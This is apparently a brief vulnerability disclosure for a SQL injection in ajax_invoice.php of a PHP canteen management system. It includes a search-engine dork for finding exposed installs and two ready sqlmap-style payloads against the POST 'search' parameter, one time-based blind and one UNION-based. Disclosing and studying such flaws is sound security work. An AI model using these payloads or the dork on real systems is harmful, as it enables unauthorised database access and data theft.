Canteen Management System ajax_invoice.php sql injection
inurl:ajax_invoice.php
Abstract:
Line 12 of ajax_invoice.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement's meaning or to execute arbitrary SQL commands.
Explanation:
SQL injection errors occur when:
- Data enters a program from an untrusted source.
- The data is used to dynamically construct a SQL query.
In this case, the data is passed to query() in ajax_invoice.php at line 12.
0.png 2.pngParameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=111' AND (SELECT 4223 FROM (SELECT(SLEEP(5)))ZSei) AND 'losz'='losz
Type: UNION query
Title: Generic UNION query (NULL) - 18 columns
Payload: search=111' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767071,0x6f77615353725145624672616a4f4470785372484f4259796d744a776a5a48665065644b46467451,0x716b716271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
1.png
Download Code:
https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html
网友评论